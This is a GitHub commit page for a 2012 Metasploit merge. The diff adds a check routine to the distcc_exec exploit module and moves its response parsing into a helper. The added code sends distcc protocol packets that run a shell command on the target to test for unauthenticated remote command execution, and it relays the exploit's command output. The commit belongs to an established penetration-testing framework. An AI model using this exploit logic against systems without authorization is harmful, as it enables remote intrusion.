Skip to content
Browse files

Merge branch 'distcc-add-check' of https://github.com/jlee-r7/metaspl…

…oit-framework into jlee-r7-distcc-add-check
  • Loading branch information...
2 parents 2988727 + 96c16a4 commit af8cb03d1bd8d2e75f48c9b609ea8bdd4c4588e5 @sinn3r sinn3r committed Jun 18, 2012
Showing with 35 additions and 12 deletions.
  1. +35 −12 modules/exploits/unix/misc/distcc_exec.rb
View
47 modules/exploits/unix/misc/distcc_exec.rb
@@ -63,6 +63,21 @@ def initialize(info = {})
], self.class)
end
+ def check
+ r = rand_text_alphanumeric(10)
+ connect
+ sock.put(dist_cmd("sh", "-c", "echo #{r}"))
+
+ dtag = rand_text_alphanumeric(10)
+ sock.put("DOTI0000000A#{dtag}\n")
+
+ err, out = read_output
+ if out.index(r)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
def exploit
connect
@@ -72,6 +87,21 @@ def exploit
dtag = rand_text_alphanumeric(10)
sock.put("DOTI0000000A#{dtag}\n")
+ err, out = read_output
+
+ (err || "").split("\n") do |line|
+ print_status("stderr: #{line}")
+ end
+ (out || "").split("\n") do |line|
+ print_status("stdout: #{line}")
+ end
+
+ handler
+ disconnect
+ end
+
+ def read_output
+
res = sock.get_once(24, 5)
if !(res and res.length == 24)
@@ -85,29 +115,22 @@ def exploit
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [nil, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stderr: #{line}")
- end
+ err = sock.get_once(len, 5)
end
# Check STDOUT
res = sock.get_once(4, 5)
res = sock.get_once(8, 5)
len = [res].pack("H*").unpack("N")[0]
- return if not len
+ return [err, nil] if not len
if (len > 0)
- res = sock.get_once(len, 5)
- res.split("\n").each do |line|
- print_status("stdout: #{line}")
- end
+ out = sock.get_once(len, 5)
end
+ return [err, out]
- handler
- disconnect
end

0 comments on commit af8cb03

Please sign in to comment.
Something went wrong with that request. Please try again.